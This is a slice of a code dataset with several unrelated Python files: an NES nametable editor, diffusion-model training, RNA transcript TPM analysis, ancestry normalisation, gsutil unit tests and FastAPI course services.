t\n i = 1\n imax = min(128, len(self.bytes) - base)\n basebyte = self.bytes[base]\n while (i < imax\n and basebyte == self.bytes[base + i]):\n i += 1\n # if the run is either length 3 or to the end of the file,\n # write it\n if i > 2 or base + i == len(self.bytes):\n out.append(1 - i)\n out.append(self.bytes[base])\n base += i\n continue\n\n # measure the nonrun starting at t\n i = 1\n imax = min(128, len(self.bytes) - base)\n while (i < imax\n and (base + i + 2 >= len(self.bytes)\n or self.bytes[base + i] != self.bytes[base + i + 1]\n or self.bytes[base + i] != self.bytes[base + i + 2])):\n i += 1\n out.append(i - 1)\n out.extend(self.bytes[base:base + i])\n base += i\n return out\n\n @staticmethod\n def test():\n pb = PackBits('stopping stoppping stopppppi')\n data = pb.flush()\n print repr(data)\n\nclass UnPackBits(PackBits):\n def flush(self):\n out = array('b')\n base = 0\n while base < len(self.bytes):\n c = self.bytes[base]\n if c > 0 and c <= 127:\n b = self.bytes[base + 1]\n out.extend(self.bytes[base + 1:base + c + 2])\n base += 2 + c\n elif c >= -127:\n b = self.bytes[base + 1]\n out.fromlist([b] * (1 - c))\n base += 2\n return out\n\n @staticmethod\n def test():\n start = 'stopping stoppping stopppppi'\n packed = PackBits(start).flush().tostring()\n print repr(packed)\n unpacked = UnPackBits(packed).flush().tostring()\n print repr(unpacked)\n print \"pass\" if start == unpacked else \"fail\"\n \n\nclass App:\n filetypes = [\n ('NES nametable', '*.nam'),\n ('NES compressed nametable', '*.pkb'),\n ('PNG image', '*.png'),\n ('GIF image', '*.gif'),\n ('Windows bitmap', '*.bmp')\n ]\n\n def __init__(self, w, doc):\n import sys\n self.window = w\n self.doc = doc\n mbardata = [\n (\"File\", [\n (\"&New Nametable\", lambda: self.file_new_nam(), \"Ctrl+N\"),\n (\"&Open Nametable...\", lambda: self.file_open_nam(), \"Ctrl+O\"),\n (\"Open &Pattern Table...\", lambda: self.file_open_chr(), \"Ctrl+L\"),\n '-',\n (\"&Save\", lambda: self.file_save_nam(), \"Ctrl+S\"),\n (\"Save &As...\", lambda: self.file_save_nam_as(), \"Ctrl+A\"),\n '-',\n (\"E&xit\", lambda: self.file_quit(), \"Ctrl+Q\")\n ]),\n (\"Help\", [\n (\"&About...\", lambda: self.about())\n ])\n ]\n (menubar, menus) = build_menubar(w, mbardata)\n w.bind(\"\", lambda e: self.file_new_nam())\n w.bind(\"\", lambda e: self.file_new_nam())\n w.bind(\"\", lambda e: self.file_open_nam())\n w.bind(\"\", lambda e: self.file_open_nam())\n w.bind(\"\", lambda e: self.file_open_chr())\n w.bind(\"\", lambda e: self.file_open_chr())\n w.bind(\"\", lambda e: self.file_save_nam())\n w.bind(\"\", lambda e: self.file_save_nam())\n w.bind(\"\", lambda e: self.file_quit())\n w.bind(\"\", lambda e: self.file_quit())\n\n self.tilePicker = TilePicker(w, doc)\n self.tilePicker.grid(row=0,column=0, sticky=NW)\n self.namDisplay = NamDisplay(w, doc, borderwidth=0)\n self.namDisplay.grid(row=0,column=1)\n self.namDisplay.bind(\"\", self.namPickupCallback)\n self.namDisplay.bind(\"\", self.namPickupCallback)\n self.namDisplay.bind(\"\", self.namWriteCallback)\n self.namDisplay.bind(\"\", self.namWriteCallback)\n w.wm_resizable(0,0)\n self.updWindowTitle()\n\n def namPickupCallback(self, event):\n if event.x >= 0 and event.x < 512 and event.y >= 0 and event.y < 512:\n x = event.x // 16\n y = event.y // 16\n (tile, attribute) = self.doc.getTile(x, y)\n self.tilePicker.curTile = tile\n self.tilePicker.setAttribute(attribute)\n return\n \n def namWriteCallback(self, event):\n if event.x >= 0 and event.x < 512 and event.y >= 0 and event.y < 512:\n x = event.x // 16\n y = event.y // 16\n t = self.tilePicker.curTile\n a = self.tilePicker.curAttribute\n self.doc.setTile(x, y, t, a)\n if not self.doc.unsaved:\n self.doc.setUnsaved(True)\n self.updWindowTitle()\n self.namDisplay.updTile(x, y)\n return\n\n def updWindowTitle(self):\n nfn = self.doc.namfilename\n if nfn is None:\n nfn = 'untitled'\n if self.doc.unsaved:\n nfn = '*' + nfn\n appname = '8name II'\n title = ' - '.join((nfn, appname))\n self.window.title(title)\n \n def file_new_nam(self):\n print \"File > New Nametable\"\n\n def file_open_nam(self):\n from tkFileDialog import askopenfilename\n filename = askopenfilename(parent=root,\n filetypes=self.filetypes,\n initialfile=self.doc.namfilename,\n title=\"Open Nametable\")\n print \"file open nam: filename is\", filename\n if not isinstance(filename, basestring):\n return\n self.doc.loadnam(filename)\n self.namDisplay.updScreen()\n self.updWindowTitle()\n\n def file_open_chr(self):\n from tkFileDialog import askopenfilename\n filename = askopenfilename(parent=root,\n filetypes=[('Pattern Table', '*.chr')],\n initialfile=self.doc.namfilename,\n title=\"Open Pattern Table\")\n if not isinstance(filename, str):\n return\n self.doc.loadchr(filename)\n self.tilePicker.updateWidgets()\n self.namDisplay.updScreen()\n\n def file_save_nam(self):\n if self.doc.namfilename is None:\n return self.file_save_nam_as()\n self.doc.savenam()\n self.updWindowTitle()\n\n def file_save_nam_as(self):\n from tkFileDialog import asksaveasfilename\n filename = asksaveasfilename(parent=root,\n filetypes=self.filetypes,\n title=\"Save Nametable As\")\n ext = filename[-4:].lower()\n if ext in ('.png', '.gif', '.bmp'):\n print \"Would save image to\", filename\n else:\n self.doc.savenam(filename)\n self.updWindowTitle()\n\n def file_quit(self):\n self.window.destroy()\n\nroot = Tk()\napp = App(root, NamFile('../spritecans.chr'))\nroot.mainloop()\nprint \"remain:\"\nprint \"1. implement image saving\"\nprint \"2. implement and test loading\"\nprint \"3. implement and test compressed pkb support\"\nprint \"4. Implement stub methods for File menu items\"\nprint \"5. Warn on closing document where doc.unsaved is not False\"\nprint \"6. Write palette editor\"\n"} {"ext": "py", "sha": "1a2f2709e216f80da7171499ad9a4b12bdbb6cb6", "content": "# Write a Python program to find out the number of CPUs using.\nimport multiprocessing\nprint(multiprocessing.cpu_count())\n"} {"ext": "py", "sha": "1a2f275364493555282f3be31fdd27bafcd03635", "content": "from denoising_diffusion_pytorch import Unet, GaussianDiffusion, Trainer\nimport os\n\ndef main(train):\n if train==True:\n model = Unet(\n dim = 128,\n dim_mults = (1, 2, 2, 2)\n ).cuda()\n\n diffusion = GaussianDiffusion(\n model,\n image_size = 32,\n timesteps = 1000, # number of steps\n loss_type = 'l2' # L1 or L2\n ).cuda()\n\n trainer = Trainer(\n diffusion,\n '/home/congen/code/geoml_gan/data/cifar10',\n train=True,\n dataset_name='cifar10',\n image_size=32,\n train_batch_size = 64,\n train_lr = 2e-4,\n train_num_steps = 500001, # total training steps\n gradient_accumulate_every = 2, # gradient accumulation steps\n ema_decay = 0.9999, # exponential moving average decay\n fp16 = True # turn on mixed precision training with apex\n )\n #trainer.load(20)\n trainer.train()\n else:\n\n model = Unet(\n dim=128,\n dim_mults=(1, 2, 2, 2)\n ).cuda()\n\n diffusion = GaussianDiffusion(\n model,\n image_size=32,\n timesteps=1000, # number of steps\n loss_type='l2' # L1 or L2\n ).cuda()\n\n trainer = Trainer(\n diffusion,\n '/home/congen/code/geoml_gan/data/cifar10',\n train=False,\n dataset_name='cifar10',\n image_size=32,\n train_batch_size=64,\n train_lr=2e-4,\n train_num_steps=200001, # total training steps\n gradient_accumulate_every=2, # gradient accumulation steps\n ema_decay=0.9999, # exponential moving average decay\n fp16=True # turn on mixed precision training with apex\n )\n trainer.test()\n\n\n\"\"\"\n Usage:\n\n export CUDA_VISIBLE_DEVICES=2\n export PORT=6006\n export CUDA_HOME=/opt/cuda/cuda-10.2\n export TIME_STR=1\n python train.py \n\n\n :return:\n \"\"\"\nif __name__ == '__main__':\n if 'CUDA_VISIBLE_DEVICES' not in os.environ:\n os.environ['CUDA_VISIBLE_DEVICES'] = '2'\n main(False)"} {"ext": "py", "sha": "1a2f27d2d5ea5b56f238e84a811160b2415bf74c", "content": "# get human_ebv_tpms.py\nimport pandas as pd\nimport argparse\nimport os\nimport math\nimport datetime\nimport subprocess\n\n# get basename from a file and path string\ndef get_basename(filepath):\n import os\n return os.path.basename(os.path.splitext(filepath)[0]) \n\n# get and format output directory\ndef format_odir(odir):\n import os\n cwd = os.getcwd()\n\n if odir != '':\n # if first character is not /, use cwd to make this an absolute path\n if odir[0] != '/' and odir[0] != '~':\n odir = cwd+odir\n if odir[-1] != '/':\n odir += '/'\n return odir\n\n# make a dated output directory for the files used for the tracks\ndef make_dated_folder(odir, bname):\n date = datetime.datetime.now()\n date = date.strftime('%y%m%d')\n odir = odir+date+'_'+bname+'_figures/'\n\n if not os.path.isdir(odir):\n print('Making output directory '+odir)\n os.makedirs(odir)\n return odir\n\n# get value associated with keyword in the 9th column of gtf\ndef get_field_value(key, fields):\n if key not in fields:\n return None\n else:\n return fields.split(key+' \"')[1].split()[0].replace('\";','')\n\n# calculate tpm for a column in the abundance table\ndef get_tpm(df, col):\n\tnew_col = 'TPM_'+col\n\ttotal_reads = df[d].sum()\n\tdf[new_col] = df.apply(lambda x: float(x[d]*1000000)/total_reads, axis=1)\n\n\treturn new_col, df\n\n# calculate tpm for a column in the abundance table\ndef get_log_tpm(df, col, gene):\n\ttpm_col = 'TPM_'+col\n\tif not gene:\n\t\tnew_col = 'log_'+tpm_col\n\telse:\n\t\tnew_col = 'gene_log_'+TPM_col\n\tdf[new_col] = df.apply(lambda x: math.log2(x[tpm_col]+1), axis=1)\n\n\treturn new_col, df\n\n# get gtf file name \nparser = argparse.ArgumentParser(description='removes EBV transcripts from GTF file')\nparser.add_argument('--human_gtf', help='GTF with human and EBV data')\nparser.add_argument('--human_filt_ab', help='Filtered abundance file with human and EBV data')\nparser.add_argument('--human_ab', help='Unfiltered abundance file with human and EBV data')\nparser.add_argument('--ebv_filt_ab', help='EBV only filtered abundance file')\nparser.add_argument('--ebv_ab', help='EBV only unfiltered abundance file')\nparser.add_argument('--datasets', help='Comma-separated list of dataset names to use for human+ebv data')\nparser.add_argument('--o', help='Prefix for output file')\n\nargs = parser.parse_args()\n\nfull_gtf = args.human_gtf\nfull_ab = args.human_filt_ab\nfull_unf_ab = args.human_ab\nebv_ab = args.ebv_filt_ab\nebv_unf_ab = args.ebv_ab\n\nmy_datasets = args.datasets.split(',')\n\noprefix = args.o\n\n# get all human transcript ids\ninfile = open(full_gtf, 'r')\nhuman_tids = []\nebv_tids = []\nfor i, line in enumerate(infile): \n line = line.replace('\\n', '')\n temp = line.split('\\t')\n fields = temp[-1]\n\n if temp[0] != 'chrEBV' and temp[2] == 'transcript':\n human_tids.append(get_field_value('talon_transcript', fields))\n elif temp[0] == 'chrEBV' and temp[2] == 'transcript':\n ebv_tids.append(get_field_value('talon_transcript', fields))\n \nfull_df = pd.read_csv(full_ab, sep='\\t')\nebv_df = pd.read_csv(ebv_ab, sep='\\t')\n\n# reformat human table\n# dc_datasets = ['D4', 'D5', 'D10', 'D11']\ndatasets = my_datasets\n# full_df.drop(dc_datasets, inplace=True, axis=1) # drop datasets we don't want\nfull_df = full_df.loc[full_df[datasets].sum(axis=1) != 0] # drop transcripts with no reads in datasets we do want\nfull_df = full_df.loc[full_df['transcript_ID'].isin(human_tids)] # drop ebv transcripts\nfull_df['ebv'] = 'Human' # give human/ebv designation\nfull_df = full_df.loc[full_df.transcript_novelty != 'Genomic']\n\n# drop genomic transcripts from the ebv dataset (b/c it's not pre-filtered)\nebv_df = ebv_df.loc[ebv_df.transcript_novelty != 'Genomic']\nebv_df['ebv'] = 'EBV' # human/ebv designation\n\n# merge transcript df so TPMs can be calculated correctly\nt_df = pd.concat([full_df, ebv_df])\n\n# combine datasets\ncombine_datasets = True\nif combine_datasets:\n t_df['combined'] = t_df[my_datasets].sum(axis=1)\n datasets = ['combined']\n\n# # make sure the concatenation worked\n# print(t_df.loc[t_df['transcript_ID'] == 121].head())\n# print(ebv_df.loc[ebv_df['transcript_ID'] == 121].head())\n# print(full_df.loc[full_df['transcript_ID'] == 121].head())\n\n# get tpms and number of human transcripts for \n# each dataset and for full/ebv\nfor d in datasets:\n\n # raw TPM\n tpm, t_df = get_tpm(t_df, d)\n\n # log2TPM\n log, t_df = get_log_tpm(t_df, d, 0)\n\n # sanity check - sum of all TPMs for each sample\n print('TPM total for {}: {}'.format(d, str(t_df[tpm].sum())))\n\n human_df = t_df.loc[(t_df[d] != 0) & (t_df['ebv'] == 'Human')]\n ebv_df = t_df.loc[(t_df[d] != 0) & (t_df['ebv'] == 'EBV')]\n n_human_transcripts = len(human_df.index)\n n_ebv_transcripts = len(ebv_df.index)\n print('Number of human transcripts in {}: {}'.format(d, str(n_human_transcripts)))\n print('Number of EBV transcripts in {}: {}'.format(d, str(n_ebv_transcripts)))\n\n # add columns for number of dataset human/ebv transcripts\n n_transcripts_col = 'n_'+d\n t_df[n_transcripts_col] = t_df.apply(lambda x:\\\n n_human_transcripts if x['ebv'] == 'Human' else n_ebv_transcripts, axis=1)\n\n # add heights geom_text locations for dataset/human/ebv transcripts\n human_height = t_df.loc[t_df.ebv == 'Human'][log].max()+1\n ebv_height = t_df.loc[t_df.ebv == 'EBV'][log].max()+1\n height_col = d+'_height'\n t_df[height_col] = t_df.apply(lambda x:\\\n human_height if x.ebv == 'Human' else ebv_height, axis=1)\n\n # print(human_height)\n # print(ebv_height)\n\n# print(t_df.head())\n# print(t_df.tail())\n\n# write gene and transcript tables to a csv\nt_df['dot_size'] = t_df.apply(lambda x: 1 if x['ebv'] == 'EBV' else 0.6, axis=1)\nt_df['alpha'] = t_df.apply(lambda x: 0.5 if x['ebv'] == 'EBV' else 0.2, axis=1)\n\n\n# bname = get_basename(ebv_ab)\n# odir = format_odir(os.path.dirname(ebv_ab))\n# odir = make_dated_folder(odir,bname)\nto = oprefix+'_ebv_human_transcript_abundance.csv'\nt_df.to_csv(to, sep=',', index=False)\n\n## get transcript tpms without filtering for bioreps to use for gene tpms\n# read in the unfiltered datasets\nfull_df = pd.read_csv(full_unf_ab, sep='\\t')\nebv_df = pd.read_csv(ebv_unf_ab, sep='\\t')\n\n# reformat human table\n# dc_datasets = ['D4', 'D5', 'D10', 'D11']\ndatasets = my_datasets\n# full_df.drop(dc_datasets, inplace=True, axis=1) # drop datasets we don't want\nfull_df = full_df.loc[full_df['transcript_ID'].isin(human_tids)] # drop ebv transcripts\nfull_df['ebv'] = 'Human' # give human/ebv designation\nfull_df = full_df.loc[full_df.transcript_novelty != 'Genomic']\n\n# drop genomic transcripts from the ebv dataset (b/c it's not pre-filtered)\nebv_df = ebv_df.loc[ebv_df.transcript_novelty != 'Genomic']\nebv_df['ebv'] = 'EBV' # human/ebv designation\n\n# merge transcript df so TPMs can be calculated correctly\nt_df = pd.concat([full_df, ebv_df])\n\n# combine datasets\ncombine_datasets = True\nif combine_datasets:\n t_df['combined'] = t_df[datasets].sum(axis=1)\n datasets = ['combined']\n\n# # make sure the concatenation worked\n# print(t_df.loc[t_df['transcript_ID'] == 121].head())\n# print(ebv_df.loc[ebv_df['transcript_ID'] == 121].head())\n# print(full_df.loc[full_df['transcript_ID'] == 121].head())\n\n# get tpms and number of human transcripts for \n# each dataset and for full/ebv\nfor d in datasets:\n\n # raw TPM\n tpm, t_df = get_tpm(t_df, d)\n\n # log2TPM\n log, t_df = get_log_tpm(t_df, d, 0)\n\n # sanity check - sum of all TPMs for each sample\n print('TPM total for {}: {}'.format(d, str(t_df[tpm].sum())))\n\n human_df = t_df.loc[(t_df[d] != 0) & (t_df['ebv'] == 'Human')]\n ebv_df = t_df.loc[(t_df[d] != 0) & (t_df['ebv'] == 'EBV')]\n n_human_transcripts = len(human_df.index)\n n_ebv_transcripts = len(ebv_df.index)\n print('Number of human transcripts in {}: {}'.format(d, str(n_human_transcripts)))\n print('Number of EBV transcripts in {}: {}'.format(d, str(n_ebv_transcripts)))\n\n # add columns for number of dataset human/ebv transcripts\n n_transcripts_col = 'n_'+d\n t_df[n_transcripts_col] = t_df.apply(lambda x:\\\n n_human_transcripts if x['ebv'] == 'Human' else n_ebv_transcripts, axis=1)\n\n # add heights geom_text locations for dataset/human/ebv transcripts\n human_height = t_df.loc[t_df.ebv == 'Human'][log].max()+1\n ebv_height = t_df.loc[t_df.ebv == 'EBV'][log].max()+1\n height_col = d+'_height'\n t_df[height_col] = t_df.apply(lambda x:\\\n human_height if x.ebv == 'Human' else ebv_height, axis=1)\n\n# get gene tpms\ncols = []\nfor d in datasets:\n cols.append(d)\n cols.append('TPM_'+d)\ng_df = t_df.groupby(['gene_ID', 'gene_novelty', 'ebv'])[cols].sum()\ng_df.reset_index(inplace=True)\n\n# # make sure the groupby worked\n# print(g_df.loc[g_df['gene_ID'] == 16].head())\n# print(t_df.loc[t_df['gene_ID'] == 16].head())\n# print(t_df.loc[t_df['gene_ID'] == 16].head())\n\n# get tpms, heights, and numbers for gene\nfor d in datasets:\n # log2TPM\n log, g_df = get_log_tpm(g_df, d, 0)\n\n human_df = g_df.loc[(g_df[d] != 0) & (g_df['ebv'] == 'Human')]\n ebv_df = g_df.loc[(g_df[d] != 0) & (g_df['ebv'] == 'EBV')]\n n_human_genes = len(human_df.index)\n n_ebv_genes = len(ebv_df.index)\n print('Number of human genes in {}: {}'.format(d, str(n_human_genes)))\n print('Number of EBV genes in {}: {}'.format(d, str(n_ebv_genes)))\n\n # add columns for number of dataset human/ebv genes\n n_genes_col = 'n_'+d\n g_df[n_genes_col] = g_df.apply(lambda x:\\\n n_human_genes if x['ebv'] == 'Human' else n_ebv_genes, axis=1)\n\n # add heights geom_text locations for dataset/human/ebv transcripts\n human_height = g_df.loc[g_df.ebv == 'Human'][log].max()+0.4\n ebv_height = g_df.loc[g_df.ebv == 'EBV'][log].max()+0.4\n height_col = d+'_height'\n g_df[height_col] = g_df.apply(lambda x:\\\n human_height if x.ebv == 'Human' else ebv_height, axis=1)\n\n print(human_height)\n print(ebv_height)\n\nprint(g_df.head())\nprint(g_df.tail())\n\n\n# add different dot sizes for human/ebv\n# t_df['dot_size'] = t_df.apply(lambda x: 1 if x['ebv'] == 'EBV' else 0.6, axis=1)\ng_df['dot_size'] = g_df.apply(lambda x: 1 if x['ebv'] == 'EBV' else 0.6, axis=1)\n\n# t_df['alpha'] = t_df.apply(lambda x: 0.5 if x['ebv'] == 'EBV' else 0.2, axis=1)\ng_df['alpha'] = g_df.apply(lambda x: 0.5 if x['ebv'] == 'EBV' else 0.2, axis=1)\n\n# # rename gene/transcript novelty columns\n# t_df.rename(index=str, columns={\\\n# 'transcript_novelty':'Isoform Type'}, inplace=True)\n# g_df.rename(index=str, columns={\\\n# 'gene_novelty':'Gene Type'}, inplace=True)\n\n\n# write gene table to a csv \n\ngo = oprefix+'_ebv_human_gene_abundance.csv'\ng_df.to_csv(go, sep=',', index=False)\n\n# make graphs\ncmd = 'Rscript plot_ebv_v_human_abundances.R --gene_csv {} --transcript_csv {}'\\\n\t ' --datasets {}'.format(go, to, ','.join(datasets))\n# print(cmd)\n\n"} {"ext": "py", "sha": "1a2f27ec83540a6ba9ef180cbaaf5615dbe3c9a6", "content": "#!/usr/bin/env python\n\n\"\"\"\n\n Normalize site observed ancestry by genome-wide average.\n 2*ID_average - ExpectedCopiesOfPop1Ancestry.\n @Author: wavefancy@gmail.com\n\n Usage:\n HapmixEPop1NormalizedByIDAverage.py -a IDaverage\n HapmixEPop1NormalizedByIDAverage.py -h | --help | -v | --version | -f | --format\n\n Notes:\n 1. Read ExpectedCopiesOfPop1Ancestry from stdin, and output to stdout.\n\n Options:\n -a IDaverage Individual average for pop1, one line one person.\n -h --help Show this screen.\n -v --version Show version.\n -f --format Show input/output file format example.\n\n\"\"\"\nimport sys\nfrom docopt import docopt\nfrom signal import signal, SIGPIPE, SIG_DFL\n\ndef ShowFormat():\n '''File format example'''\n print('''\n #ExpectedCopiesOfPop1Ancestry, one column each person.\n ------------------------\n1 1 2 1 2 2\n1 2 2 1 2 2\n\n #id average:\n ------------------------\n0.8\n0.5\n0.1\n\n #output:\n ------------------------\n0.40 0.00 -0.20\n-0.60 0.00 -0.20\n ''');\n\nif __name__ == '__main__':\n args = docopt(__doc__, version='1.0')\n # print(args)\n # sys.exit(0)\n\n if(args['--format']):\n ShowFormat()\n sys.exit(-1)\n\n idav = [] # 2*ID_average\n with open(args['-a'],'r') as ifile:\n for line in ifile:\n line = line.strip()\n if line:\n idav.append(2 * float(line))\n\n checkLen = True\n for line in sys.stdin:\n line = line.strip()\n if line:\n ss = line.split()\n ss = [float(x) for x in ss] #number of pop1 copy for each person.\n\n if checkLen:\n if len(ss) != len(idav):\n sys.stderr.write('Error: numbr of individuals in ID_average file is not the same as that in sys.stdin.\\n')\n sys.exit(-1)\n else:\n checkLen = False\n\n out = [ '%.2f'%(y-x) for x,y in zip(idav, ss)]\n sys.stdout.write('%s\\n'%('\\t'.join(out)))\n\nsys.stdout.flush()\nsys.stdout.close()\nsys.stderr.flush()\nsys.stderr.close()\n"} {"ext": "py", "sha": "1a2f2822f81fe36b28f6dd2487506ab31227c11b", "content": "# -*- coding: utf-8 -*-\n# Copyright 2021 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Tests for execution_util.py.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nimport subprocess\nfrom unittest import mock\n\nfrom gslib import exception\nfrom gslib.tests import testcase\nfrom gslib.utils import execution_util\n\n\nclass TestExecutionUtil(testcase.GsUtilUnitTestCase):\n \"\"\"Test execution utils.\"\"\"\n\n @mock.patch.object(subprocess, 'Popen')\n def testExternalCommandReturnsNoOutput(self, mock_Popen):\n mock_command_process = mock.Mock()\n mock_command_process.returncode = 0\n mock_command_process.communicate.return_value = (None, None)\n mock_Popen.return_value = mock_command_process\n\n stdout, stderr = execution_util.ExecuteExternalCommand(['fake-command'])\n self.assertIsNone(stdout)\n self.assertIsNone(stderr)\n\n mock_Popen.assert_called_once_with(['fake-command'],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n @mock.patch.object(subprocess, 'Popen')\n def testExternalCommandReturnsStringOutput(self, mock_Popen):\n mock_command_process = mock.Mock()\n mock_command_process.returncode = 0\n mock_command_process.communicate.return_value = ('a', 'b')\n mock_Popen.return_value = mock_command_process\n\n stdout, stderr = execution_util.ExecuteExternalCommand(['fake-command'])\n self.assertEqual(stdout, 'a')\n self.assertEqual(stderr, 'b')\n\n mock_Popen.assert_called_once_with(['fake-command'],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n @mock.patch.object(subprocess, 'Popen')\n def testExternalCommandReturnsBytesOutput(self, mock_Popen):\n mock_command_process = mock.Mock()\n mock_command_process.returncode = 0\n mock_command_process.communicate.return_value = (b'a', b'b')\n mock_Popen.return_value = mock_command_process\n\n stdout, stderr = execution_util.ExecuteExternalCommand(['fake-command'])\n self.assertEqual(stdout, 'a')\n self.assertEqual(stderr, 'b')\n\n mock_Popen.assert_called_once_with(['fake-command'],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n @mock.patch.object(subprocess, 'Popen')\n def testExternalCommandReturnsNoOutput(self, mock_Popen):\n mock_command_process = mock.Mock()\n mock_command_process.returncode = 1\n mock_command_process.communicate.return_value = (None, b'error')\n mock_Popen.return_value = mock_command_process\n\n with self.assertRaises(exception.ExternalBinaryError):\n execution_util.ExecuteExternalCommand(['fake-command'])\n\n mock_Popen.assert_called_once_with(['fake-command'],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n @mock.patch.object(subprocess, 'Popen')\n def testExternalCommandRaisesFormattedStderr(self, mock_Popen):\n mock_command_process = mock.Mock()\n mock_command_process.returncode = 1\n mock_command_process.communicate.return_value = (None, b'error.\\n')\n mock_Popen.return_value = mock_command_process\n\n with self.assertRaisesRegexp(exception.ExternalBinaryError, 'error'):\n execution_util.ExecuteExternalCommand(['fake-command'])\n"} {"ext": "py", "sha": "1a2f29c011035f3771d9e24758c92c2c15286a7c", "content": "\"\"\"Collection of services.\"\"\"\nfrom typing import Any, Dict, List, Optional\n\nfrom fastapi import HTTPException, status\nfrom tortoise import QuerySet\n\nfrom teached.users.models import Teacher\n\nfrom .models import ( # noqa I202\n Announcement,\n Assignment,\n BookMark,\n Category,\n Course,\n CourseDetailPydantic,\n Enrollment,\n Language,\n Lecture,\n Requirement,\n Review,\n Section,\n)\nfrom .schema import CourseDetail\nfrom .utils import unique_slug\n\n\nasync def create_course(*, data: Dict, teacher: Teacher) -> str:\n \"\"\"Create new course.\n\n Args:\n data: Dict of new user info.\n teacher: Teacher model instance.\n\n Returns:\n Slug of the course\n \"\"\"\n languages = data.pop(\"languages\")\n\n categories = data.pop(\"categories\")\n\n requirements = data.pop(\"requirements\")\n\n course = Course(**data, teacher=teacher)\n\n # TODO: change this to signal\n course.slug = unique_slug(title=data.get(\"title\"))\n\n await course.save()\n\n for language in languages:\n value, created = await Language.get_or_create(name=language.capitalize())\n\n await course.languages.add(value)\n\n for category in categories:\n value, created = await Category.get_or_create(name=category.capitalize())\n\n await course.categories.add(value)\n\n for requirement in requirements:\n await Requirement.create(name=requirement.capitalize(), course=course)\n\n return course.slug\n\n\nasync def get_published_courses(\n *,\n search: Optional[str] = None,\n category: Optional[str] = None,\n language: Optional[str] = None,\n level: Optional[str] = None,\n price: Optional[str] = None,\n discount: Optional[str] = None,\n) -> QuerySet[Course]:\n \"\"\"Return all published courses.\n\n Args:\n search: Search courses by title.\n category: Filter by category.\n language: Filter by language.\n level: Filter by level.\n price: Filter by price.\n discount: Filter by discount.\n\n Returns:\n Query set of course.\n \"\"\"\n courses = Course.filter(is_drift=False, is_active=True)\n\n if search:\n courses = courses.filter(title=search)\n\n if category:\n courses = courses.filter(categories__name=category)\n\n if language:\n courses = courses.filter(languages__name=language)\n\n if level:\n courses = courses.filter(level=level)\n\n if price:\n courses = courses.filter(price=price)\n\n if discount:\n courses = courses.filter(discount=discount)\n\n return courses\n\n\nasync def get_published_course(*, slug: str, user: Any) -> CourseDetail:\n \"\"\"Return a published courses.\n\n Args:\n slug: The slug of course.\n user: Current authenticated user.\n\n Returns:\n Query set of course.\n \"\"\"\n course = await Course.get(is_drift=False, is_active=True, slug=slug)\n pydatic_data = await CourseDetailPydantic.from_tortoise_orm(course)\n data = pydatic_data.dict()\n data.update(\n {\n \"is_authenticated\": user is not None,\n \"has_enroll\": False,\n \"is_owner\": False,\n \"enrollments\": await course.enrollments.all().count(),\n \"reviews\": await course.reviews.all().count(),\n }\n )\n\n if user:\n user_student = await user.students.first()\n user_teacher = await user.teachers.first()\n\n if user_student:\n data.update(\n {\n \"has_enroll\": await course.enrollments.filter(\n student=user_student\n ).first()\n is not None\n }\n )\n\n author = await course.teacher\n\n if user_teacher == author:\n data.update({\"is_owner\": True})\n\n # TODO: change it to computed method.\n reviews = course.reviews.all()\n try:\n rate = sum(review.rate for review in await reviews) / await reviews.count()\n\n except ZeroDivisionError:\n rate = 0\n\n data.update({\"rate\": rate})\n\n return CourseDetail(**data)\n\n\nasync def enroll_to_published_course(*, slug: str, student: Any) -> Dict[str, str]:\n \"\"\"Enroll new student to a published course.\n\n Args:\n slug: The slug of course.\n student: Student instances.\n\n Returns:\n Dict.\n\n Raises:\n HTTPException: If use has already enrolled.\n \"\"\"\n course = await Course.get(is_drift=False, is_active=True, slug=slug)\n\n if await course.enrollments.filter(student=student):\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=f\"You already enrolled to {course}\",\n )\n\n if course.price > 0:\n print(\"Payment\")\n # TODO: add the stripe payment\n # stripe()\n\n # TODO: add payment process to the payment model\n # Payment()\n\n await Enrollment.create(course=course, student=student)\n\n return {\n \"detail\": f\"Yea! you have enrolled to {course}, go and enjoy the course now :)\"\n }\n\n\nasync def bookmark_a_published_course(*, slug: str, student: Any) -> Dict[str, str]:\n \"\"\"Bookmark a published course.\n\n Args:\n slug: The slug of course.\n student: Student instances.\n\n Returns:\n Dict.\n\n Raises:\n HTTPException: If use has already bookmarked.\n \"\"\"\n course = await Course.get(is_drift=False, is_active=True, slug=slug)\n\n if await course.book_marks.filter(course=course, student=student):\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=f\"You already bookmark {course}\",\n )\n\n await BookMark.create(course=course, student=student)\n\n return {\"detail\": f\"{course} has been bookmarked :)\"}\n\n\nasync def get_bookmarks(*, student: Any) -> List[Dict]:\n \"\"\"Get list of bookmark.\n\n Args:\n student: Student instances.\n\n Returns:\n List of bookmarked course.\n \"\"\"\n course_list = []\n for bookmark in await BookMark.filter(student=student):\n course = await bookmark.course\n course_list.append(\n {\"title\": f\"{course.title}\", \"cover\": {course.cover}, \"slug\": course.slug}\n )\n return course_list\n\n\nasync def create_review_for_published_course(\n *, slug: str, data: Dict, student: Any\n) -> Dict[str, str]:\n \"\"\"Create review for a published course.\n\n Args:\n slug: The slug of course.\n data: Dict of data for review creation.\n student: Student instances.\n\n Returns:\n Dict.\n\n Raises:\n HTTPException: If use has has not enroll for the course or\n student review the course already.\n \"\"\"\n course = await Course.get(is_drift=False, is_active=True, slug=slug)\n\n if not await course.enrollments.filter(student=student):\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=\"You need to enroll to the course first\",\n )\n\n if await course.reviews.filter(student=student):\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=\"You already review this course\",\n )\n await Review.create(**data, 